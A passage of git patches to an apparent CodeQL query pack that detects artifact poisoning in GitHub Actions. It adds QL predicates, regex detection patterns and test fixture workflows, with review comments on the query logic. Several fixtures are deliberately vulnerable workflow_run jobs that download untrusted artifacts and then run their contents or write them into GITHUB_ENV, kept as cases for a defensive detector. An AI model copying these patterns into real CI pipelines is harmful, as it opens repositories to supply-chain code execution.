+| trilom/file-changes-action | * | output.files_modified | PR changed files |
+| trilom/file-changes-action | * | output.files_removed | PR changed files |
 | tzkhan/pr-update-action | * | output.headMatch | |
 | xt0rted/slash-command-action | * | output.command-arguments | |
 summaries
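Review bot: `job` is no longer joined to `downloadStep` — the removed `job.getStep(i) = download` conjunct was the only link — so `job.getWorkflow().isPrivileged()` now holds whenever any privileged job exists anywhere in the database, and every download/poisonable pair is reported regardless of whether its own workflow is privileged. Re-add the link next to the privilege check, e.g. `job.getStep(_) = downloadStep and`, so the privilege test applies to the workflow that actually contains the download. The cross product is invisible in the test suite because all the fixtures are `workflow_run` workflows, which the query presumably treats as privileged; a non-privileged fixture with a download step would pin the fix.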
diff --git a/ql/test/query-tests/Security/CWE-829/.github/workflows/artifactpoisoning11.yml b/ql/test/query-tests/Security/CWE-829/.github/workflows/artifactpoisoning11.yml
new file mode 100644
index 000000000000..f8d3736dba51
--- /dev/null
+++ b/ql/test/query-tests/Security/CWE-829/.github/workflows/artifactpoisoning11.yml
@@ -0,0 +1,41 @@
+name: Pull Request Open
+
+on:
+ workflow_run:
+ workflows: ["Prev"]
+ types:
+ - completed
+
+jobs:
+ Download:
+ runs-on: ubuntu-latest
+ steps:
+ - uses: actions/github-script@v6
+ with:
+ script: |
+ let allArtifacts = await github.rest.actions.listWorkflowRunArtifacts({
+ owner: context.repo.owner,
+ repo: context.repo.repo,
+ run_id: context.payload.workflow_run.id,
+ });
+ let matchArtifact = allArtifacts.data.artifacts.filter((artifact) => {
+ return artifact.name == ""
+ })[0];
+ let download = await github.rest.actions.downloadArtifact({
+ owner: context.repo.owner,
+ repo: context.repo.repo,
+ artifact_id: matchArtifact.id,
+ archive_format: 'zip',
+ });
+ let fs = require('fs');
+ fs.writeFileSync(`${process.env.GITHUB_WORKSPACE}/sonarcloud-data.zip`, Buffer.from(download.data));
+ - name: Unzip
+ run: |
+ unzip sonarcloud-data.zip -d sonarcloud-data
+ ls -a sonarcloud-data
+ - name: Run command
+ run:
+ ./sonarcloud-data/x.py build -j$(nproc) --compiler gcc --skip-build
+
+
+
diff --git a/ql/test/query-tests/Security/CWE-829/.github/workflows/artifactpoisoning1.yml b/ql/test/query-tests/Security/CWE-829/.github/workflows/artifactpoisoning12.yml
similarity index 73%
rename from ql/test/query-tests/Security/CWE-829/.github/workflows/artifactpoisoning1.yml
rename to ql/test/query-tests/Security/CWE-829/.github/workflows/artifactpoisoning12.yml
index 4755350f0fc8..edcdc3b2064e 100644
--- a/ql/test/query-tests/Security/CWE-829/.github/workflows/artifactpoisoning1.yml
+++ b/ql/test/query-tests/Security/CWE-829/.github/workflows/artifactpoisoning12.yml
@@ -27,8 +27,14 @@ jobs:
 artifact_id: matchArtifact.id,
 archive_format: 'zip',
 });
+ let fs = require('fs');
+ fs.writeFileSync(`${process.env.GITHUB_WORKSPACE}/sonarcloud-data.zip`, Buffer.from(download.data));
+ - name: Unzip
+ run: |
+ unzip sonarcloud-data.zip
+ ls -a sonarcloud-data
 - name: Run command
- run: cmd
-
+ run:
+ ./x.py build -j$(nproc) --compiler gcc --skip-build
diff --git a/ql/test/query-tests/Security/CWE-829/.github/workflows/artifactpoisoning3.yml b/ql/test/query-tests/Security/CWE-829/.github/workflows/artifactpoisoning21.yml
similarity index 51%
rename from ql/test/query-tests/Security/CWE-829/.github/workflows/artifactpoisoning3.yml
rename to ql/test/query-tests/Security/CWE-829/.github/workflows/artifactpoisoning21.yml
index 4d2a9774753a..2f39bfd307aa 100644
--- a/ql/test/query-tests/Security/CWE-829/.github/workflows/artifactpoisoning3.yml
+++ b/ql/test/query-tests/Security/CWE-829/.github/workflows/artifactpoisoning21.yml
@@ -10,10 +10,14 @@ jobs:
 Download:
 runs-on: ubuntu-latest
 steps:
- - run: |
- gh run download "${WORKFLOW_RUN_ID}" --repo "${GITHUB_REPOSITORY}" --name "artifact_name"
+ - uses: dawidd6/action-download-artifact@v2
+ with:
+ name: artifact_name
+ workflow: wf.yml
+ path: foo
 - name: Run command
- run: cmd
+ run: |
+ ./foo/cmd
diff --git a/ql/test/query-tests/Security/CWE-829/.github/workflows/artifactpoisoning2.yml b/ql/test/query-tests/Security/CWE-829/.github/workflows/artifactpoisoning22.yml
similarity index 94%
rename from ql/test/query-tests/Security/CWE-829/.github/workflows/artifactpoisoning2.yml
rename to ql/test/query-tests/Security/CWE-829/.github/workflows/artifactpoisoning22.yml
index 725038ab8165..31fa30175512 100644
--- a/ql/test/query-tests/Security/CWE-829/.github/workflows/artifactpoisoning2.yml
+++ b/ql/test/query-tests/Security/CWE-829/.github/workflows/artifactpoisoning22.yml
@@ -15,7 +15,7 @@ jobs:
 name: artifact_name
 workflow: wf.yml
 - name: Run command
- run: cmd
+ run: ./cmd
diff --git a/ql/test/query-tests/Security/CWE-829/.github/workflows/artifactpoisoning31.yml b/ql/test/query-tests/Security/CWE-829/.github/workflows/artifactpoisoning31.yml
new file mode 100644
index 000000000000..0e7c6f97cf5d
--- /dev/null
+++ b/ql/test/query-tests/Security/CWE-829/.github/workflows/artifactpoisoning31.yml
@@ -0,0 +1,22 @@
+name: Pull Request Open
+
+on:
+ workflow_run:
+ workflows: ["Prev"]
+ types:
+ - completed
+
+jobs:
+ Download:
+ runs-on: ubuntu-latest
+ steps:
+ - run: |
+ gh run download "${{github.event.workflow_run.id}}" --repo "${GITHUB_REPOSITORY}" --name "artifact_name"
+ - name: Unzip
+ run: |
+ unzip artifact_name.zip -d foo
+ - name: Run command
+ run: ./foo/cmd
+
+
+
diff --git a/ql/test/query-tests/Security/CWE-829/.github/workflows/artifactpoisoning32.yml b/ql/test/query-tests/Security/CWE-829/.github/workflows/artifactpoisoning32.yml
new file mode 100644
index 000000000000..7a837ee42d2c
--- /dev/null
+++ b/ql/test/query-tests/Security/CWE-829/.github/workflows/artifactpoisoning32.yml
@@ -0,0 +1,21 @@
+name: Pull Request Open
+
+on:
+ workflow_run:
+ workflows: ["Prev"]
+ types:
+ - completed
+
+jobs:
+ Download:
+ runs-on: ubuntu-latest
+ steps:
+ - run: |
+ gh run download "${{github.event.workflow_run.id}}" --repo "${GITHUB_REPOSITORY}" --name "artifact_name" --dir foo
+ unzip artifact_name.zip -d bar
+ - name: Run command
+ run: |
+ ./bar/cmd
+
+
+
diff --git a/ql/test/query-tests/Security/CWE-829/.github/workflows/artifactpoisoning33.yml b/ql/test/query-tests/Security/CWE-829/.github/workflows/artifactpoisoning33.yml
new file mode 100644
index 000000000000..39ec063c7b64
--- /dev/null
+++ b/ql/test/query-tests/Security/CWE-829/.github/workflows/artifactpoisoning33.yml
@@ -0,0 +1,21 @@
+name: Pull Request Open
+
+on:
+ workflow_run:
+ workflows: ["Prev"]
+ types:
+ - completed
+
+jobs:
+ Download:
+ runs-on: ubuntu-latest
+ steps:
+ - run: |
+ gh run download "${{github.event.workflow_run.id}}" --repo "${GITHUB_REPOSITORY}" --name "artifact_name" --dir foo
+ unzip foo/artifact_name.zip
+ - name: Run command
+ run: |
+ ./bar/cmd
+
+
+
diff --git a/ql/test/query-tests/Security/CWE-829/.github/workflows/artifactpoisoning41.yml b/ql/test/query-tests/Security/CWE-829/.github/workflows/artifactpoisoning41.yml
new file mode 100644
index 000000000000..afa3e15132e3
--- /dev/null
+++ b/ql/test/query-tests/Security/CWE-829/.github/workflows/artifactpoisoning41.yml
@@ -0,0 +1,25 @@
+name: Pull Request Open
+
+on:
+ workflow_run:
+ workflows: ["Prev"]
+ types:
+ - completed
+
+jobs:
+ Download:
+ runs-on: ubuntu-latest
+ steps:
+ - run: |
+ artifacts_url=${{ github.event.workflow_run.artifacts_url }}
+ gh api "$artifacts_url" -q '.artifacts[] | [.name, .archive_download_url] | @tsv' | while read artifact
+ do
+ IFS=$'\t' read name url <<< "$artifact"
+ gh api $url > "$name.zip"
+ unzip -d "foo" "$name.zip"
+ done
+ - name: Run command
+ run: ./foo/cmd
+
+
+
diff --git a/ql/test/query-tests/Security/CWE-829/.github/workflows/artifactpoisoning4.yml b/ql/test/query-tests/Security/CWE-829/.github/workflows/artifactpoisoning42.yml
similarity index 89%
rename from ql/test/query-tests/Security/CWE-829/.github/workflows/artifactpoisoning4.yml
rename to ql/test/query-tests/Security/CWE-829/.github/workflows/artifactpoisoning42.yml
index 26d342f7060c..d3100d46edc7 100644
--- a/ql/test/query-tests/Security/CWE-829/.github/workflows/artifactpoisoning4.yml
+++ b/ql/test/query-tests/Security/CWE-829/.github/workflows/artifactpoisoning42.yml
@@ -16,10 +16,10 @@ jobs:
 do
 IFS=$'\t' read name url <<< "$artifact"
 gh api $url > "$name.zip"
- unzip -d "$name" "$name.zip"
+ unzip "$name.zip"
 done
 - name: Run command
- run: cmd
+ run: ./cmd
diff --git a/ql/test/query-tests/Security/CWE-829/.github/workflows/artifactpoisoning51.yml b/ql/test/query-tests/Security/CWE-829/.github/workflows/artifactpoisoning51.yml
new file mode 100644
index 000000000000..ca074428ccfa
--- /dev/null
+++ b/ql/test/query-tests/Security/CWE-829/.github/workflows/artifactpoisoning51.yml
@@ -0,0 +1,24 @@
+name: Pull Request Open
+
+on:
+ workflow_run:
+ workflows: ["Prev"]
+ types:
+ - completed
+
+jobs:
+ Download:
+ runs-on: ubuntu-latest
+ steps:
+ - run: |
+ gh run download "${{github.event.workflow_run.id}}" --repo "${GITHUB_REPOSITORY}" --name "artifact_name"
+ - name: Unzip
+ run: |
+ unzip artifact_name.zip -d foo
+ - name: Env Var Injection
+ run: |
+ echo "pr_number=$(cat foo/bar)" >> $GITHUB_ENV
+
+
+
+
diff --git a/ql/test/query-tests/Security/CWE-829/ArtifactPoisoning.expected b/ql/test/query-tests/Security/CWE-829/ArtifactPoisoning.expected
index 8113215481c1..907979b88e7c 100644
--- a/ql/test/query-tests/Security/CWE-829/ArtifactPoisoning.expected
+++ b/ql/test/query-tests/Security/CWE-829/ArtifactPoisoning.expected
@@ -1,4 +1,10 @@
-| .github/workflows/artifactpoisoning1.yml:13:9:30:6 | Uses Step | Potential artifact poisoning. |
-| .github/workflows/artifactpoisoning2.yml:13:9:17:6 | Uses Step | Potential artifact poisoning. |
-| .github/workflows/artifactpoisoning3.yml:13:9:15:6 | Run Step | Potential artifact poisoning. |
-| .github/workflows/artifactpoisoning4.yml:13:9:21:6 | Run Step | Potential artifact poisoning. |
+| .github/workflows/artifactpoisoning11.yml:13:9:32:6 | Uses Step | Potential artifact poisoning. |
+| .github/workflows/artifactpoisoning12.yml:13:9:32:6 | Uses Step | Potential artifact poisoning. |
+| .github/workflows/artifactpoisoning21.yml:13:9:18:6 | Uses Step | Potential artifact poisoning. |
+| .github/workflows/artifactpoisoning22.yml:13:9:17:6 | Uses Step | Potential artifact poisoning. |
+| .github/workflows/artifactpoisoning31.yml:13:9:15:6 | Run Step | Potential artifact poisoning. |
+| .github/workflows/artifactpoisoning32.yml:13:9:16:6 | Run Step | Potential artifact poisoning. |
+| .github/workflows/artifactpoisoning33.yml:13:9:16:6 | Run Step | Potential artifact poisoning. |
+| .github/workflows/artifactpoisoning41.yml:13:9:21:6 | Run Step | Potential artifact poisoning. |
+| .github/workflows/artifactpoisoning42.yml:13:9:21:6 | Run Step | Potential artifact poisoning. |
+| .github/workflows/artifactpoisoning51.yml:13:9:15:6 | Run Step | Potential artifact poisoning. |
diff --git a/ql/test/query-tests/Security/CWE-829/UnpinnedActionsTag.expected b/ql/test/query-tests/Security/CWE-829/UnpinnedActionsTag.expected
index 5a572edf423f..7bee36029d6b 100644
--- a/ql/test/query-tests/Security/CWE-829/UnpinnedActionsTag.expected
+++ b/ql/test/query-tests/Security/CWE-829/UnpinnedActionsTag.expected
@@ -1,6 +1,7 @@ | .github/workflows/actor_trusted_checkout.yml:19:7:23:4 | Uses Step | Unpinned 3rd party Action 'actor_trusted_checkout.yml' step $@ uses 'completely/fakeaction' with ref 'v2', not a pinned commit hash | .github/workflows/actor_trusted_checkout.yml:19:7:23:4 | Uses Step | Uses Step | | .github/workflows/actor_trusted_checkout.yml:23:7:26:21 | Uses Step | Unpinned 3rd party Action 'actor_trusted_checkout.yml' step $@ uses 'fakerepo/comment-on-pr' with ref 'v1', not a pinned commit hash | .github/workflows/actor_trusted_checkout.yml:23:7:26:21 | Uses Step | Uses Step | -| .github/workflows/artifactpoisoning2.yml:13:9:17:6 | Uses Step | Unpinned 3rd party Action 'Pull Request Open' step $@ uses 'dawidd6/action-download-artifact' with ref 'v2', not a pinned commit hash | .github/workflows/artifactpoisoning2.yml:13:9:17:6 | Uses Step | Uses Step | +| .github/workflows/artifactpoisoning21.yml:13:9:18:6 | Uses Step | Unpinned 3rd party Action 'Pull Request Open' step $@ uses 'dawidd6/action-download-artifact' with ref 'v2', not a pinned commit hash | .github/workflows/artifactpoisoning21.yml:13:9:18:6 | Uses Step | Uses Step | +| .github/workflows/artifactpoisoning22.yml:13:9:17:6 | Uses Step | Unpinned 3rd party Action 'Pull Request Open' step $@ uses 'dawidd6/action-download-artifact' with ref 'v2', not a pinned commit hash | .github/workflows/artifactpoisoning22.yml:13:9:17:6 | Uses Step | Uses Step | | .github/workflows/auto_ci.yml:93:9:96:6 | Uses Step | Unpinned 3rd party Action 'Python CI' step $@ uses 'codecov/codecov-action' with ref 'v3', not a pinned commit hash | .github/workflows/auto_ci.yml:93:9:96:6 | Uses Step | Uses Step | | .github/workflows/auto_ci.yml:108:9:119:6 | Uses Step: create_pr | Unpinned 3rd party Action 'Python CI' step $@ uses 'peter-evans/create-pull-request' with ref 'v5', not a pinned commit hash | .github/workflows/auto_ci.yml:108:9:119:6 | Uses Step: create_pr | Uses Step: create_pr | | 
.github/workflows/auto_ci.yml:125:9:133:6 | Uses Step | Unpinned 3rd party Action 'Python CI' step $@ uses 'thollander/actions-comment-pull-request' with ref 'v2', not a pinned commit hash | .github/workflows/auto_ci.yml:125:9:133:6 | Uses Step | Uses Step | From 3209378f453a2ad58038e8d74b77747d344f5013 Mon Sep 17 00:00:00 2001 From: =?UTF-8?q?Alvaro=20Mu=C3=B1oz?= Date: Fri, 5 Apr 2024 14:25:25 +0200 Subject: [PATCH 149/707] Remove TODO --- ql/lib/codeql/actions/security/ArtifactPoisoningQuery.qll | 1 - 1 file changed, 1 deletion(-) diff --git a/ql/lib/codeql/actions/security/ArtifactPoisoningQuery.qll b/ql/lib/codeql/actions/security/ArtifactPoisoningQuery.qll index c64a7d0e3383..8094235292a0 100644 --- a/ql/lib/codeql/actions/security/ArtifactPoisoningQuery.qll +++ b/ql/lib/codeql/actions/security/ArtifactPoisoningQuery.qll @@ -196,4 +196,3 @@ class EnvVarInjectionRunStep extends PoisonableStep, Run { ) } } -// TODO: Taint Step for output var definition based on file content. eg: `echo "sha=$(cat test-results/sha-number)" >> $GITHUB_OUTPUT` From 2651e5a673137a923cd744dd69dc3d8e937d46e5 Mon Sep 17 00:00:00 2001 
From: =?UTF-8?q?Alvaro=20Mu=C3=B1oz?= Date: Mon, 8 Apr 2024 12:52:10 +0200 Subject: [PATCH 150/707] Improve Artifact poisoning related queries --- ql/lib/codeql/actions/Ast.qll | 53 +++++++++++ .../codeql/actions/dataflow/FlowSources.qll | 10 ++ ql/lib/codeql/actions/dataflow/FlowSteps.qll | 23 ++++- .../dataflow/internal/DataFlowPrivate.qll | 6 +- .../security/ArtifactPoisoningQuery.qll | 94 +++++++++++++++---- ql/lib/ext/marocchino_on_artifact.model.yml | 6 ++ ...bers-in-action_download-artifact.model.yml | 7 ++ ql/test/library-tests/test.expected | 16 ++++ ql/test/library-tests/test.ql | 29 ++++++ .../.github/workflows/artifactpoisoning1.yml | 89 ++++++++++++++++++ .../.github/workflows/artifactpoisoning2.yml | 23 +++++ .../Security/CWE-094/CodeInjection.expected | 8 ++ .../CWE-094/PrivilegedCodeInjection.expected | 10 ++ 13 files changed, 350 insertions(+), 24 deletions(-) create mode 100644 ql/lib/ext/marocchino_on_artifact.model.yml create mode 100644 ql/lib/ext/redhat-plumbers-in-action_download-artifact.model.yml create mode 100644 ql/test/query-tests/Security/CWE-094/.github/workflows/artifactpoisoning1.yml create mode 100644 ql/test/query-tests/Security/CWE-094/.github/workflows/artifactpoisoning2.yml diff --git a/ql/lib/codeql/actions/Ast.qll b/ql/lib/codeql/actions/Ast.qll index 720fd29feb0f..a9fe35259c5c 100644 --- a/ql/lib/codeql/actions/Ast.qll +++ b/ql/lib/codeql/actions/Ast.qll 
@@ -18,6 +18,59 @@ module Utils { "toJSON\\(\\s*" + regex + "\\s*\\)" ] } + + bindingset[line, var] + predicate extractAssignment(string line, string var, string key, string value) { + exists(string assignment | + ( + assignment = + line.regexpCapture("(echo|Write-Output)\\s+\"(.*)\"\\s*>>\\s*(\"|')?\\$GITHUB_" + + var.toUpperCase() + "(\"|')?", 2) + .regexpReplaceAll("^\"", "") + .regexpReplaceAll("\"$", "") or + assignment = + line.regexpCapture("(echo|Write-Output)\\s+'(.*)'\\s*>>\\s*(\"|')?\\$GITHUB_" + + var.toUpperCase() + "(\"|')?", 2) + .regexpReplaceAll("^'", "") + .regexpReplaceAll("'$", "") or + assignment = + line.regexpCapture("(echo|Write-Output)\\s+([^'\"]*)\\s*>>\\s*(\"|')?\\$GITHUB_" + + var.toUpperCase() + "(\"|')?", 2) + ) and + key = assignment.splitAt("=", 0).trim() and + value = assignment.splitAt("=", 1).trim() + or + ( + assignment = + line.regexpCapture("(echo|Write-Output)\\s+\"::set-" + var.toLowerCase() + + "\\s+name=(.*)\"", 2).regexpReplaceAll("^\"", "").regexpReplaceAll("\"$", "") or + assignment = + line.regexpCapture("(echo|Write-Output)\\s+'::set-" + var.toLowerCase() + "\\s+name=(.*)'", + 2).regexpReplaceAll("^'", "").regexpReplaceAll("'$", "") or + assignment = + line.regexpCapture("(echo|Write-Output)\\s+::set-" + var.toLowerCase() + "\\s+name=(.*)", + 2) + ) and + key = assignment.splitAt("::", 0).trim() and + value = assignment.splitAt("::", 1).trim() + ) + } + + predicate writeToGitHubEnv(Run run, string key, string value) { + exists(string script, string line | + script = run.getScript() and + line = script.splitAt("\n") and + Utils::extractAssignment(line, "ENV", key, value) + ) + } + + predicate writeToGitHubOutput(Run run, string key, string value) { + exists(string script, string line | + script = run.getScript() and + line = script.splitAt("\n") and + Utils::extractAssignment(line, "OUTPUT", key, value) + ) + } } class AstNode instanceof AstNodeImpl { 
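Review bot: `extractAssignment` truncates the value at the second `=` because `assignment.splitAt("=", 1)` yields only the segment between the first and second `=`, so `echo "url=a=b" >> $GITHUB_ENV` binds `value = "a"`; the `::set-` branch has the same problem with `splitAt("::", 1)`. Cutting at the first separator instead keeps the whole value: `key = assignment.prefix(assignment.indexOf("=", 0, 0)).trim() and value = assignment.suffix(assignment.indexOf("=", 0, 0) + 1).trim()`. Because `regexpCapture` must match the entire line, an indented statement (inside an `if` or loop body of the script) is also not recognised unless the patterns begin with `\\s*`. None of the three new predicates carries QLDoc; a one-liner on `extractAssignment` such as `/** Holds if line writes key=value to $GITHUB_var, via >> redirection or the deprecated ::set-var workflow command. */`, and similar ones on `writeToGitHubEnv` and `writeToGitHubOutput`, would document the contract callers rely on.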
diff --git a/ql/lib/codeql/actions/dataflow/FlowSources.qll b/ql/lib/codeql/actions/dataflow/FlowSources.qll index 699b5f6f6c3c..c0e0e759120f 100644 --- a/ql/lib/codeql/actions/dataflow/FlowSources.qll +++ b/ql/lib/codeql/actions/dataflow/FlowSources.qll @@ -2,6 +2,7 @@ private import actions private import codeql.actions.DataFlow private import codeql.actions.dataflow.ExternalFlow private import codeql.actions.Ast::Utils as Utils +private import codeql.actions.security.ArtifactPoisoningQuery /** * A data flow source. @@ -157,3 +158,12 @@ private class CompositeActionInputSource extends RemoteFlowSource { override string getSourceType() { result = "Composite action input" } } + +/** + * A downloadeded artifact. + */ +private class ArtifactToOptionSource extends RemoteFlowSource { + ArtifactToOptionSource() { this.asExpr() instanceof ArtifactDownloadStep } + + override string getSourceType() { result = "Step output from Artifact" } +} diff --git a/ql/lib/codeql/actions/dataflow/FlowSteps.qll b/ql/lib/codeql/actions/dataflow/FlowSteps.qll index 343578168127..242cbcf9a31a 100644 --- a/ql/lib/codeql/actions/dataflow/FlowSteps.qll +++ b/ql/lib/codeql/actions/dataflow/FlowSteps.qll @@ -6,6 +6,8 @@ private import actions private import codeql.util.Unit private import codeql.actions.DataFlow private import codeql.actions.dataflow.ExternalFlow +private import codeql.actions.Ast::Utils as Utils +private import codeql.actions.security.ArtifactPoisoningQuery /** * A unit class for adding additional taint steps. 
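Review bot: The QLDoc on the new `ArtifactToOptionSource` class reads `A downloadeded artifact.`; it should be `A downloaded artifact.`. The class name, its source type string `Step output from Artifact` and the characteristic predicate (the node is an `ArtifactDownloadStep`) each describe the source differently; a sentence in the doc stating that every step matching `ArtifactDownloadStep` is treated as a remote flow source, and a name aligned with that, would make the intent clear. The new import of `codeql.actions.security.ArtifactPoisoningQuery` into a dataflow module also deserves a short comment, since the security library presumably depends on the dataflow library and a reader will wonder about the direction of the dependency.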
@@ -40,12 +42,25 @@ predicate envToOutputStoreStep(DataFlow::Node pred, DataFlow::Node succ, DataFlo exists(string script, string line | script = run.getScript() and line = script.splitAt("\n") and - ( - output = line.regexpCapture(".*::set-output\\s+name=(.*)::.*", 1) or - output = line.regexpCapture(".*echo\\s*\"(.*)=.*\\s*>>\\s*(\")?\\$GITHUB_OUTPUT.*", 1) - ) and + Utils::extractAssignment(line, "OUTPUT", output, _) and line.indexOf("$" + ["", "{", "ENV{"] + varName) > 0 ) and succ.asExpr() = run ) } + +/** + * A downloaded artifact that gets assigned to a Run step output. + * - uses: actions/download-artifact@v2 + * - run: echo "::set-output name=id::$(>\\s*\\$GITHUB_ENV", 2) and - value = line.regexpCapture("echo\\s+(\")?([^=]+)\\s*=(.*)(\")?\\s*>>\\s*\\$GITHUB_ENV", 3) - ) -} - class EnvVarInjectionRunStep extends PoisonableStep, Run { EnvVarInjectionRunStep() { exists(ArtifactDownloadStep step, string value | @@ -191,8 +247,10 @@ class EnvVarInjectionRunStep extends PoisonableStep, Run { // Heuristic: // Run step with env var definition based on file content. // eg: `echo "sha=$(cat test-results/sha-number)" >> $GITHUB_ENV` - writeToGithubEnv(this, _, value) and - value.regexpMatch(".*cat\\s+.*") + // eg: `echo "sha=$(> $GITHUB_ENV` + Utils::writeToGitHubEnv(this, _, value) and + // TODO: add support for other commands like `<`, `jq`, ... + value.regexpMatch(["\\$\\(", "`"] + ["cat\\s+", "<"] + ".*" + ["`", "\\)"]) ) } } diff --git a/ql/lib/ext/marocchino_on_artifact.model.yml b/ql/lib/ext/marocchino_on_artifact.model.yml new file mode 100644 index 000000000000..9f621758cffb --- /dev/null +++ b/ql/lib/ext/marocchino_on_artifact.model.yml @@ -0,0 +1,6 @@ +extensions: + - addsTo: + pack: githubsecuritylab/actions-all + extensible: sourceModel + data: + - ["marocchino/on_artifact", "*", "output.*", "Downloaded artifact"] 
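Review bot: The new `value.regexpMatch(["\\$\\(", "`"] + ["cat\\s+", "<"] + ".*" + ["`", "\\)"])` condition in `EnvVarInjectionRunStep` requires the whole `value` to match, so an assignment whose file read is embedded in a longer value, such as `echo "sha=pr-$(cat foo/bar)" >> $GITHUB_ENV`, is not treated as poisonable. Surrounding the pattern with `".*"` on both sides, or replacing the cross product with `value.regexpMatch(".*(\\$\\(|`)\\s*(cat\\s+|<).*")`, covers that case; the cross product also produces mismatched opener/closer pairs (a `$(` opener with a backtick closer and vice versa) that are harmless but obscure the intent. The same expression is used by `EnvVarInjectionFromFileSink` in the later `EnvVarInjectionQuery.qll` hunk of patch 153 and should be fixed there too. The `EnvVarInjectionRunStep` class begins outside this hunk.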
diff --git a/ql/lib/ext/redhat-plumbers-in-action_download-artifact.model.yml b/ql/lib/ext/redhat-plumbers-in-action_download-artifact.model.yml new file mode 100644 index 000000000000..52c478dd1d4d --- /dev/null +++ b/ql/lib/ext/redhat-plumbers-in-action_download-artifact.model.yml @@ -0,0 +1,7 @@ +extensions: + - addsTo: + pack: githubsecuritylab/actions-all + extensible: sourceModel + data: + - ["redhat-plumbers-in-action/download-artifact", "*", "output.*", "Downloaded artifact"] + diff --git a/ql/test/library-tests/test.expected b/ql/test/library-tests/test.expected index ea353609e249..8b5f3e7184ba 100644 --- a/ql/test/library-tests/test.expected +++ b/ql/test/library-tests/test.expected @@ -329,7 +329,9 @@ sources | jitterbit/get-changed-files | * | output.removed | PR changed files | | jitterbit/get-changed-files | * | output.renamed | PR changed files | | khan/pull-request-comment-trigger | * | output.comment_body | Comment body | +| marocchino/on_artifact | * | output.* | Downloaded artifact | | octo-org/source-repo/.github/workflows/workflow.yml | * | output.workflow-output | Foo | +| redhat-plumbers-in-action/download-artifact | * | output.* | Downloaded artifact | | tj-actions/branch-names | * | output.current_branch | PR current branch | | tj-actions/branch-names | * | output.head_ref_branch | PR head branch | | tj-actions/branch-names | * | output.ref_branch | Branch tirggering workflow run | 
@@ -425,3 +427,17 @@ testNormalizeExpr | github.event.pull_request.user["login"] | github.event.pull_request.user.login | | github.event.pull_request.user['login'] | github.event.pull_request.user.login | | github.event.pull_request['user']['login'] | github.event.pull_request.user.login | +writeToGitHubEnv +| id1 | $(> $GITHUB_ENV", + "echo 'sha2=$(> $GITHUB_ENV", + "echo sha3=$(> $GITHUB_ENV", + ] and + Utils::extractAssignment(t, "ENV", key, value) + ) +} + +query predicate writeToGitHubOutput(string key, string value) { + exists(string t | + t = + [ + "echo \"::set-output name=id1::$(> $GITHUB_OUTPUT", + "echo 'sha2=$(> $GITHUB_OUTPUT", + "echo sha3=$(> $GITHUB_OUTPUT", + ] and + Utils::extractAssignment(t, "OUTPUT", key, value) + ) +} diff --git a/ql/test/query-tests/Security/CWE-094/.github/workflows/artifactpoisoning1.yml b/ql/test/query-tests/Security/CWE-094/.github/workflows/artifactpoisoning1.yml new file mode 100644 index 000000000000..8475711949f8 --- /dev/null +++ b/ql/test/query-tests/Security/CWE-094/.github/workflows/artifactpoisoning1.yml 
@@ -0,0 +1,89 @@ +name: Preview Deploy + +on: + workflow_run: + workflows: ["Preview Build"] + types: + - completed + +jobs: + success: + runs-on: ubuntu-latest + if: github.event.workflow_run.event == 'pull_request' && github.event.workflow_run.conclusion == 'success' + steps: + - name: download pr artifact + uses: dawidd6/action-download-artifact@v2 + with: + workflow: ${{ github.event.workflow_run.workflow_id }} + name: pr + + - name: save PR id + id: pr + run: echo "::set-output name=id::$( + + + body-include: '' + number: ${{ steps.pr.outputs.id }} + + - name: The job failed + if: ${{ failure() }} + uses: actions-cool/maintain-one-comment@v1.2.1 + with: + token: ${{ secrets.GITHUB_TOKEN }} + body: | + 😭 Deploy PR Preview failed. + + + + + body-include: '' + number: ${{ steps.pr.outputs.id }} + + failed: + runs-on: ubuntu-latest + if: github.event.workflow_run.event == 'pull_request' && github.event.workflow_run.conclusion == 'failure' + steps: + - name: download pr artifact + uses: dawidd6/action-download-artifact@v2 + with: + workflow: ${{ github.event.workflow_run.workflow_id }} + name: pr + + - name: save PR id + id: pr + run: echo "::set-output name=id::$( + + + body-include: '' + number: ${{ steps.pr.outputs.id }} diff --git a/ql/test/query-tests/Security/CWE-094/.github/workflows/artifactpoisoning2.yml b/ql/test/query-tests/Security/CWE-094/.github/workflows/artifactpoisoning2.yml new file mode 100644 index 000000000000..f8d80cc798e1 --- /dev/null +++ b/ql/test/query-tests/Security/CWE-094/.github/workflows/artifactpoisoning2.yml @@ -0,0 +1,23 @@ +name: Preview Deploy + +on: + workflow_run: + workflows: ["Preview Build"] + types: + - completed + +jobs: + success: + runs-on: ubuntu-latest + steps: + - id: pr + name: Download Artifact + uses: redhat-plumbers-in-action/download-artifact@main + with: + name: README + + - name: upload surge service + id: deploy + run: | + echo ${{ steps.pr.outputs.id }} + 
diff --git a/ql/test/query-tests/Security/CWE-094/CodeInjection.expected b/ql/test/query-tests/Security/CWE-094/CodeInjection.expected index 6cb2c1ed3992..d2e188ead67f 100644 --- a/ql/test/query-tests/Security/CWE-094/CodeInjection.expected +++ b/ql/test/query-tests/Security/CWE-094/CodeInjection.expected @@ -2,6 +2,9 @@ edges | .github/workflows/argus_case_study.yml:15:9:24:6 | Uses Step: remove_quotations [replaced] | .github/workflows/argus_case_study.yml:27:33:27:77 | steps.remove_quotations.outputs.replaced | | .github/workflows/argus_case_study.yml:17:25:17:53 | github.event.issue.title | .github/workflows/argus_case_study.yml:22:20:22:39 | env.ISSUE_TITLE | | .github/workflows/argus_case_study.yml:22:20:22:39 | env.ISSUE_TITLE | .github/workflows/argus_case_study.yml:15:9:24:6 | Uses Step: remove_quotations [replaced] | +| .github/workflows/artifactpoisoning1.yml:14:9:20:6 | Uses Step | .github/workflows/artifactpoisoning1.yml:20:9:24:6 | Run Step: pr [id] | +| .github/workflows/artifactpoisoning1.yml:20:9:24:6 | Run Step: pr [id] | .github/workflows/artifactpoisoning1.yml:34:67:34:92 | steps.pr.outputs.id | +| .github/workflows/artifactpoisoning2.yml:13:9:19:6 | Uses Step: pr | .github/workflows/artifactpoisoning2.yml:22:17:22:42 | steps.pr.outputs.id | | .github/workflows/changed-files.yml:16:9:20:6 | Uses Step: changed-files | .github/workflows/changed-files.yml:22:24:22:75 | steps.changed-files.outputs.all_changed_files | | .github/workflows/changelog.yml:49:19:49:56 | github.event.pull_request.title | .github/workflows/changelog.yml:58:26:58:39 | env.log | | .github/workflows/changelog_from_prt.yml:49:19:49:56 | github.event.pull_request.title | .github/workflows/changelog_from_prt.yml:58:26:58:39 | env.log | 
